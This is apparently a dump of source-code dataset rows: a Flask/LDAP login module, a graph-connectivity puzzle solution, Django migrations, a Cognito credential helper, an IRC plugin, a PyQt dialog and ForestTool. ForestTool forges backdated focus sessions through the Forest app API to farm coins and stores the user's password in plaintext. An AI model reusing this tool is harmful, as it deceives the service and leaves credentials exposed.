expires_refresh = datetime.timedelta(minutes=LOST_CONFIG.session_timeout + 2)
if FLASK_DEBUG:
expires = datetime.timedelta(days=365)
expires_refresh = datetime.timedelta(days=366)
access_token = create_access_token(identity=user_id, fresh=True, expires_delta=expires)
refresh_token = create_refresh_token(user_id, expires_delta=expires_refresh)
return access_token, refresh_token
def __authenticate_flask(self):
if self.user_name:
user = self.dbm.find_user_by_user_name(self.user_name)
if user and user.check_password(self.password):
return self.__get_token(user.idx)
return None, None
def __authenticate_ldap(self):
# auth with ldap
ldap_manager = LDAP3LoginManager()
ldap_manager.init_config(LOST_CONFIG.ldap_config)
# Check if the credentials are correct
response = ldap_manager.authenticate(self.user_name, self.password)
if response.status != AuthenticationResponseStatus.success:
# no user found in ldap, try it with db user:
return self.__authenticate_flask()
user_info = response.user_info
user = self.dbm.find_user_by_user_name(self.user_name)
# user not in db:
if not user:
user = self.__create_db_user(user_info)
else:
# user in db -> synch with ldap
user = self.__update_db_user(user_info, user)
return self.__get_token(user.idx)
def __create_db_user(self, user_info):
user = DBUser(user_name=user_info['uid'], email=user_info['mail'],
email_confirmed_at=datetime.datetime.now(), first_name=user_info['givenName'],
last_name=user_info['sn'], is_external=True)
anno_role = self.dbm.get_role_by_name(roles.ANNOTATOR)
user.roles.append(anno_role)
user.groups.append(Group(name=user.user_name, is_user_default=True))
self.dbm.save_obj(user)
return user
def __update_db_user(self, user_info, user):
user.email = user_info['mail']
user.first_name = user_info['givenName']
user.last_name = user_info['sn']
self.dbm.save_obj(user)
return user | 42.384615 | 98 | 0.667272 | 416 | 3,306 | 4.966346 | 0.247596 | 0.050339 | 0.029042 | 0.04453 | 0.239109 | 0.196515 | 0.113262 | 0.03969 | 0.03969 | 0.03969 | 0 | 0.006457 | 0.250454 | 3,306 | 78 | 99 | 42.384615 | 0.82728 | 0.04265 | 0 | 0.153846 | 0 | 0 | 0.027848 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107692 | false | 0.061538 | 0.092308 | 0 | 0.353846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eaac2ee80b3fe871703042e08987e0174fc49d74 | 919 | py | Python | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | 4 | 2020-07-24T01:59:50.000Z | 2021-07-24T15:14:08.000Z | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | hackerearth/Algorithms/Matt's Graph Book/solution.py | ATrain951/01.python-com_Qproject | c164dd093954d006538020bdf2e59e716b24d67c | [
"MIT"
] | null | null | null | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
import sys
from collections import defaultdict
sys.setrecursionlimit(100000)
def check(node, adjacency, seen):
seen[node] = True
for vertex in adjacency[node]:
if not seen[vertex]:
check(vertex, adjacency, seen)
n = int(input())
k = int(input())
edges = defaultdict(list)
for _ in range(k):
a, b = list(map(int, input().strip().split()))
edges[a].append(b)
edges[b].append(a)
x = int(input())
count = 0
visited = defaultdict(bool)
visited[x] = True
for i in range(n):
if not visited[i]:
count += 1
check(i, edges, visited)
print('Connected' if count == 1 else 'Not Connected')
| 22.975 | 94 | 0.634385 | 133 | 919 | 4.37594 | 0.526316 | 0.054983 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012802 | 0.235038 | 919 | 39 | 95 | 23.564103 | 0.815078 | 0.289445 | 0 | 0 | 0 | 0 | 0.034109 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0.041667 | false | 0 | 0.083333 | 0 | 0.125 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaaca7839f6bb2b2e2924a78a429e6572176117e | 361 | py | Python | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | python/863.all-nodes-distance-k-in-binary-tree.py | stavanmehta/leetcode | 1224e43ce29430c840e65daae3b343182e24709c | [
"Apache-2.0"
] | null | null | null | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def distanceK(self, root, target, K):
"""
:type root: TreeNode
:type target: TreeNode
:type K: int
:rtype: List[int]
"""
| 21.235294 | 41 | 0.509695 | 41 | 361 | 4.390244 | 0.609756 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.376731 | 361 | 16 | 42 | 22.5625 | 0.8 | 0.623269 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaae13d630098d1fed2c11aa237be653fb511af0 | 8,316 | py | Python | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 9 | 2019-05-11T04:42:22.000Z | 2022-03-05T03:54:19.000Z | ForestTool(Python2)/Main.py | paltis5212/ForestTool | d49026c257c88e994c8b568906ae57500d71778b | [
"MIT"
] | 4 | 2019-06-03T12:15:47.000Z | 2022-02-27T15:11:16.000Z | ForestTool(Python2)/Main.py | SmileZXLee/ForestTool | 9becb37298b86409b8ef7196969391078e39b902 | [
"MIT"
] | 8 | 2019-11-26T09:52:13.000Z | 2022-02-27T14:38:54.000Z | #coding=utf-8
__author__ = 'zxlee'
__github__ = 'https://github.com/SmileZXLee/forestTool'
import json
import time
import HttpReq
from User import User
from datetime import datetime,timedelta
import sched
import sys
import os
import platform
from dateutil.parser import parse
#是否是Windows
os_is_windows = platform.system() == 'Windows'
#种植成功时间
global plant_succ_time
plant_succ_time = datetime.now()
#程序入口
def main():
print(u'欢迎使用ForestTool')
try:
with open('user_login.txt', 'r') as f:
user_login_list = f.readlines()
if len(user_login_list) == 2:
s_account = user_login_list[0].strip('\n')
s_pwd = user_login_list[1].strip('\n')
login_input = {'account':s_account,'pwd':s_pwd}
else:
login_input = get_login()
except IOError:
login_input = get_login()
login(login_input)
#根据系统获取raw_input中文编码结果
def gbk_encode(str):
if os_is_windows:
return str.decode('utf-8').encode('gbk')
else:
return str
#获取用户输入的账号和密码
def get_login():
account = raw_input(gbk_encode('请输入您的账号: ')).decode(sys.stdin.encoding)
pwd = raw_input(gbk_encode('请输入您的密码: ')).decode(sys.stdin.encoding)
return {'account':account,'pwd':pwd}
#获取批量植树功能的用户选择信息
def get_add_time():
add_time = raw_input(gbk_encode('请输入专注时间(分钟): '))
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
add_count = raw_input(gbk_encode('请输入批量植树数量: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note,'add_count':add_count}
#获取刷金币功能的用户选择信息
def get_coin_task():
add_time = raw_input(gbk_encode('请输入每棵树种植时间(分钟)【5-120分钟,每5分钟一阶段,每增加1阶段多1金币,第一阶段2金币】: ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'add_time':add_time,'tree_type':tree_type,'note':note}
#获取刷金币功能的用户选择信息
def get_dis_add():
start_time = raw_input(gbk_encode('请输入开始时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
end_time = raw_input(gbk_encode('请输入结束时间(格式:\'2019-01-01/11:11:11\'): ')).decode(sys.stdin.encoding)
tree_type = raw_input(gbk_encode('请选择植物类型【1.开花的树 2.树屋 3.鸟巢 4.柠檬树 5.三兄弟 6.树丛 7.章鱼 8.樱花 9.椰子树 10.猫咪 11.一株很大的草 12.中国松 13.仙人掌球 14.南瓜 15.稻草人 16.圣诞树 17.中国新年竹 18.蘑菇 19.仙人掌 20.银杏 21.紫藤 22.西瓜 23.竹子 24.糖果树 25.向日葵 26.玫瑰 27.枫树 28.面包树 29.大王花 30.香蕉】,无论是否已购买都可以种植,超出30的植物有兴趣可以自行测试: ')).decode(sys.stdin.encoding)
note = raw_input(gbk_encode('请输入此任务备注: ')).decode(sys.stdin.encoding)
return {'start_time':start_time,'end_time':end_time,'tree_type':tree_type,'note':note}
#获取用户选择菜单的信息
def get_mode():
mode_input = raw_input(gbk_encode('请选择您要进行的操作: 1.自动刷金币 2.批量植树 3.根据时间区间植树 4.使用其他账号登录 5.退出ForestTool: ')).decode(sys.stdin.encoding)
return mode_input
#前往菜单
def to_menu(user):
while(True):
mode_input = get_mode()
if mode_input == '1':
add_coin_task(user)
break
elif mode_input == '2':
add_time(user)
break
elif mode_input == '3':
add_dis_time(user)
break
elif mode_input == '4':
login(get_login())
break
elif mode_input == '5':
exit(0)
break
else:
print(u'您的输入不合法,请输入选择!!')
#用户登录
def login(login_input):
post_json = {
'session':{
'email':login_input['account'],
'password':login_input['pwd'],
},
'seekruid':''
}
print(u'正在登录,请稍后...')
res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/sessions',{},post_json,'','POST')
if res.has_key('remember_token'):
user = User(res['user_name'],res['user_id'],res['remember_token'])
print (u'登录成功!!欢迎您,'+ res['user_name'])
try:
with open('user_login.txt', 'w') as f:
f.write(login_input['account']+'\n')
f.write(login_input['pwd']+'\n')
except IOError:
print(u'IO异常,无法保存账号密码')
to_menu(user)
else:
print(u'登录失败,账号或密码错误,请重新输入!!')
login(get_login())
#批量植树功能
def add_time(user):
add_time_input = get_add_time()
add_time_data = int(add_time_input['add_time'])
tree_type = int(add_time_input['tree_type'])
print(u'正在执行,请稍后...')
note = add_time_input['note']
add_count = int(add_time_input['add_count'])
curr_count = 0
while curr_count<add_count:
curr_count = curr_count+1
add_per_time(add_time_data,note,tree_type,user,curr_count,'','')
time.sleep(1)
to_menu(user)
#种植一棵树
def add_per_time(add_time_data,note,tree_type,user,per_add_count,start_time,end_time):
time_now = datetime.now()
time_now = time_now - timedelta(hours = 8)
time_pass = time_now - timedelta(minutes = add_time_data)
if len(start_time):
s_start_time = start_time
else:
s_start_time = time_pass.isoformat()
if len(end_time):
s_end_time = end_time
else:
s_end_time = time_now.isoformat()
post_json = {
"plant": {
"end_time": s_end_time,
"longitude": 0,
"note": note,
"is_success": 1,
"room_id": 0,
"die_reason": '',
"tag": 0,
"latitude": 0,
"has_left": 0,
"start_time": s_start_time,
"trees": [{
"phase": 4,
"theme": 0,
"is_dead": 0,
"position": -1,
"tree_type": tree_type
}]
},
"seekruid": str(user.user_id)
}
print(u'植树中,请稍后...')
post_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants',{},post_json,user.remember_token,'POST')
if not post_res.has_key('id'):
print(u'植树失败!!返回信息:'+post_res)
else:
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/plants/updated_plants?seekruid='+ str(user.user_id)+'&update_since='+time_now.isoformat()+'/',{},'',user.remember_token,'GET')
now_time = datetime.now()
print(u'【%s】第%d棵树种植成功!!'%(now_time.strftime("%Y-%m-%d %H:%M:%S"),per_add_count))
global plant_succ_time
plant_succ_time = now_time;
#刷金币功能
def add_coin_task(user):
get_coin_input = get_coin_task()
add_time = int(get_coin_input['add_time'])
tree_type = get_coin_input['tree_type']
note = get_coin_input['note']
get_res = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
if get_res.has_key('coin'):
print(u'您当前金币数:'+str(get_res['coin']))
print(u'开始自动刷金币,每%d分钟植一棵树...'%add_time)
total_time = 0
curr_count = 1
while True:
if curr_count == 1 or (not total_time == 0 and total_time % (add_time * 60) == 0):
add_per_time(add_time,note,tree_type,user,curr_count,'','')
curr_count = curr_count+1
get_res_sub = HttpReq.send_req('https://c88fef96.forestapp.cc/api/v1/users/'+str(user.user_id)+'/coin?seekruid='+ str(user.user_id),{},'',user.remember_token,'GET')
print(u'您当前金币数:'+str(get_res_sub['coin'])+u'(赚得金币数:'+str(get_res_sub['coin']-get_res['coin'])+')')
global plant_succ_time
total_time = int((datetime.now()-plant_succ_time).total_seconds())
if not total_time == add_time * 60:
sys.stdout.write('\r'+u'距离下一棵树种植时间 :' + str(add_time * 60 - total_time).zfill(len(str(add_time * 60))),)
sys.stdout.flush()
if total_time == add_time * 60:
print('')
time.sleep(1)
#根据时间区间种植树
def add_dis_time(user):
get_dis_input = get_dis_add()
start_time = parse(get_dis_input['start_time'])
end_time = parse(get_dis_input['end_time'])
tree_type = get_dis_input['tree_type']
note = get_dis_input['note']
s_start_time = start_time
s_start_time = s_start_time - timedelta(hours = 8)
end_time = end_time - timedelta(hours = 8)
curr_count = 0
while True:
curr_count = curr_count+1
add_per_time(10,note,tree_type,user,curr_count,s_start_time.isoformat(),(s_start_time + timedelta(minutes = 10)).isoformat())
s_start_time = s_start_time + timedelta(minutes = 10,seconds = 1)
print('下一棵树对应需求时间:'+(s_start_time + timedelta(hours = 8)).strftime("%Y-%m-%d %H:%M:%S"))
if int((end_time - s_start_time).total_seconds()) < 10:
print(u'执行完毕!!')
break;
time.sleep(1)
main()
| 34.65 | 298 | 0.69252 | 1,372 | 8,316 | 3.948251 | 0.199708 | 0.037475 | 0.028429 | 0.043936 | 0.486062 | 0.373269 | 0.310689 | 0.277829 | 0.268968 | 0.268968 | 0 | 0.039363 | 0.138528 | 8,316 | 239 | 299 | 34.794979 | 0.716778 | 0.018398 | 0 | 0.221675 | 0 | 0.014778 | 0.245274 | 0.019887 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014778 | 0.049261 | null | null | 0.078818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eaaf85302a7e40e5b38b9e1a9f53748e0813d733 | 1,300 | py | Python | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 5 | 2018-04-22T22:44:02.000Z | 2021-04-26T20:44:44.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 250 | 2018-04-24T12:04:11.000Z | 2022-03-09T06:56:47.000Z | trojsten/people/migrations/0011_auto_20170218_1724.py | MvonK/web | b701a6ea8fb6f0bdfb720e66d0a430db13db8bff | [
"MIT"
] | 8 | 2019-04-28T11:33:03.000Z | 2022-02-26T13:30:36.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-02-18 16:24
from django.db import migrations
countries = {
"Ma\u010farsko": "HU",
"Czech Republic": "CZ",
"\u010cesk\xe1 republika": "CZ",
"United Kingdom": "GB",
"Austria": "AT",
"Madarsko": "HU",
"Australia": "AU",
"Srbsko": "RS",
"Kraj Vyso\u010dina, \u010cesk\xe1 republika": "CZ",
"\u010desk\xe1 republika": "CZ",
"\u010cR": "CZ",
"Plze\u0148sk\xfd kraj, \u010cesk\xe1 republika": "CZ",
"Sverige": "SE",
"serbia": "RS",
"\xd6sterreich": "AT",
"Switzerland": "CH",
"ma\u010farsk\xe1 \u013eudovo demokratick\xe1 ": "HU",
"Kosovo": "RS",
"India": "IN",
"Uzbekistan": "UZ",
"Uganda": "UG",
"litva": "LT",
"Velka Britania": "GB",
}
def fix_country_names(apps, schema_editor):
# We can't import the Person model directly as it may be a newer
# version than this migration expects. We use the historical version.
Address = apps.get_model("people", "Address")
for address in Address.objects.all():
address.country = countries.get(address.country, "SK")
address.save()
class Migration(migrations.Migration):
dependencies = [("people", "0010_merge")]
operations = [migrations.RunPython(fix_country_names)]
| 28.888889 | 73 | 0.614615 | 157 | 1,300 | 5.044586 | 0.687898 | 0.060606 | 0.070707 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057226 | 0.206923 | 1,300 | 44 | 74 | 29.545455 | 0.71096 | 0.153077 | 0 | 0 | 1 | 0 | 0.381387 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.029412 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eab618833368798afc11263d3fd91477fc371614 | 679 | py | Python | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 2 | 2021-06-02T11:27:54.000Z | 2021-08-25T10:29:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | 86 | 2021-01-29T12:31:34.000Z | 2022-03-28T11:41:04.000Z | archiv/migrations/0015_auto_20210505_1145.py | acdh-oeaw/mmp | 7ef8f33eafd3a7985328d374130f1cbe31f77df0 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-05-05 11:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('archiv', '0014_stelle_ort'),
]
operations = [
migrations.AddField(
model_name='stelle',
name='end_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '1234'", null=True, verbose_name='End Date'),
),
migrations.AddField(
model_name='stelle',
name='start_date',
field=models.PositiveSmallIntegerField(blank=True, help_text="e.g. '300'", null=True, verbose_name='Start Date'),
),
]
| 28.291667 | 125 | 0.606775 | 75 | 679 | 5.36 | 0.546667 | 0.089552 | 0.114428 | 0.134328 | 0.477612 | 0.477612 | 0.293532 | 0.293532 | 0.293532 | 0.293532 | 0 | 0.0499 | 0.26215 | 679 | 23 | 126 | 29.521739 | 0.752495 | 0.063328 | 0 | 0.352941 | 1 | 0 | 0.141956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eabbba5703420267113fe4624cc55ee6b004fe83 | 2,338 | py | Python | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import boto3
import json
def get_auth_creds(secret_details, cipid):
# Cognito auth
auth_credentials = {}
auth_credentials['region'] = secret_details['region']
auth_credentials['policyname'] = secret_details['policyname']
cognitoIdentityClient = boto3.client(
'cognito-identity',
region_name=secret_details['region'])
cognitoClient = boto3.client(
'cognito-idp',
region_name=secret_details['region'])
response = cognitoClient.initiate_auth(
ClientId=secret_details['clientId'],
AuthFlow='USER_PASSWORD_AUTH',
AuthParameters={
'USERNAME': secret_details['username'],
'PASSWORD': secret_details['password']})
accesstoken = response['AuthenticationResult']['AccessToken']
idtoken = response['AuthenticationResult']['IdToken']
refreshtoken = response['AuthenticationResult']['RefreshToken']
provider_name = 'cognito-idp.' + \
secret_details['region'] + '.amazonaws.com/' + secret_details['userpool']
# Get the users unique identity ID
temporaryIdentityId = cognitoIdentityClient.get_id(
IdentityPoolId=cipid, Logins={provider_name: idtoken})
identityID = temporaryIdentityId["IdentityId"]
# Exchange idtoken for AWS Temporary credentials
temporaryCredentials = cognitoIdentityClient.get_credentials_for_identity(
IdentityId=identityID, Logins={provider_name: idtoken})
auth_credentials['AccessKeyId'] = temporaryCredentials["Credentials"]["AccessKeyId"]
auth_credentials['SecretKey'] = temporaryCredentials["Credentials"]["SecretKey"]
auth_credentials['SessionToken'] = temporaryCredentials["Credentials"]["SessionToken"]
auth_credentials['identityID'] = identityID
return auth_credentials
| 46.76 | 118 | 0.731394 | 244 | 2,338 | 6.877049 | 0.45082 | 0.077473 | 0.045292 | 0.027414 | 0.034565 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003581 | 0.163815 | 2,338 | 49 | 119 | 47.714286 | 0.854731 | 0.271172 | 0 | 0.060606 | 0 | 0 | 0.223077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.060606 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
eabc2d16f749bf7011211b6d1f5405973cd4be21 | 243 | py | Python | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | 1 | 2019-06-27T08:45:23.000Z | 2019-06-27T08:45:23.000Z | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | arguments = ["self", "info", "args"]
helpstring = "lurk"
minlevel = 3
def main(connection, info, args) :
"""Deops and voices the sender"""
connection.rawsend("MODE %s -o+v %s %s\n" % (info["channel"], info["sender"], info["sender"]))
| 30.375 | 98 | 0.617284 | 33 | 243 | 4.545455 | 0.69697 | 0.106667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004902 | 0.160494 | 243 | 7 | 99 | 34.714286 | 0.730392 | 0.111111 | 0 | 0 | 0 | 0 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
eabe1302de2ccdf32bfec8af5697d4396c658e09 | 6,982 | py | Python | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | null | null | null | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2018-11-06T09:30:23.000Z | 2018-11-06T09:30:23.000Z | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2019-01-23T14:46:11.000Z | 2019-01-23T14:46:11.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'volume_layout.ui'
#
# Created: Tue Mar 26 12:40:36 2013
# by: PyQt4 UI code generator 4.7.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(522, 285)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.volume_label_0 = QtGui.QLabel(Dialog)
self.volume_label_0.setObjectName("volume_label_0")
self.gridLayout.addWidget(self.volume_label_0, 2, 1, 1, 1)
self.volume_label_1 = QtGui.QLabel(Dialog)
self.volume_label_1.setObjectName("volume_label_1")
self.gridLayout.addWidget(self.volume_label_1, 3, 1, 1, 1)
self.volume_settings_1 = QtGui.QSlider(Dialog)
self.volume_settings_1.setMinimum(1)
self.volume_settings_1.setMaximum(1000)
self.volume_settings_1.setProperty("value", 802)
self.volume_settings_1.setSliderPosition(802)
self.volume_settings_1.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_1.setObjectName("volume_settings_1")
self.gridLayout.addWidget(self.volume_settings_1, 3, 2, 1, 1)
self.volume_label_2 = QtGui.QLabel(Dialog)
self.volume_label_2.setObjectName("volume_label_2")
self.gridLayout.addWidget(self.volume_label_2, 4, 1, 1, 1)
self.volume_settings_2 = QtGui.QSlider(Dialog)
self.volume_settings_2.setMinimum(1)
self.volume_settings_2.setMaximum(1000)
self.volume_settings_2.setProperty("value", 1000)
self.volume_settings_2.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_2.setObjectName("volume_settings_2")
self.gridLayout.addWidget(self.volume_settings_2, 4, 2, 1, 1)
self.volume_label_3 = QtGui.QLabel(Dialog)
self.volume_label_3.setObjectName("volume_label_3")
self.gridLayout.addWidget(self.volume_label_3, 5, 1, 1, 1)
self.volume_settings_3 = QtGui.QSlider(Dialog)
self.volume_settings_3.setMinimum(1)
self.volume_settings_3.setMaximum(1000)
self.volume_settings_3.setProperty("value", 800)
self.volume_settings_3.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_3.setObjectName("volume_settings_3")
self.gridLayout.addWidget(self.volume_settings_3, 5, 2, 1, 1)
self.volume_label_4 = QtGui.QLabel(Dialog)
self.volume_label_4.setObjectName("volume_label_4")
self.gridLayout.addWidget(self.volume_label_4, 6, 1, 1, 1)
self.volume_settings_4 = QtGui.QSlider(Dialog)
self.volume_settings_4.setMinimum(1)
self.volume_settings_4.setMaximum(1000)
self.volume_settings_4.setPageStep(12)
self.volume_settings_4.setProperty("value", 700)
self.volume_settings_4.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_4.setObjectName("volume_settings_4")
self.gridLayout.addWidget(self.volume_settings_4, 6, 2, 1, 1)
self.volume_settings_0 = QtGui.QSlider(Dialog)
self.volume_settings_0.setMinimum(1)
self.volume_settings_0.setMaximum(1000)
self.volume_settings_0.setProperty("value", 702)
self.volume_settings_0.setSliderPosition(702)
self.volume_settings_0.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_0.setObjectName("volume_settings_0")
self.gridLayout.addWidget(self.volume_settings_0, 2, 2, 1, 1)
self.box_mute_0 = QtGui.QCheckBox(Dialog)
self.box_mute_0.setObjectName("box_mute_0")
self.gridLayout.addWidget(self.box_mute_0, 2, 3, 1, 1)
self.box_mute_1 = QtGui.QCheckBox(Dialog)
self.box_mute_1.setObjectName("box_mute_1")
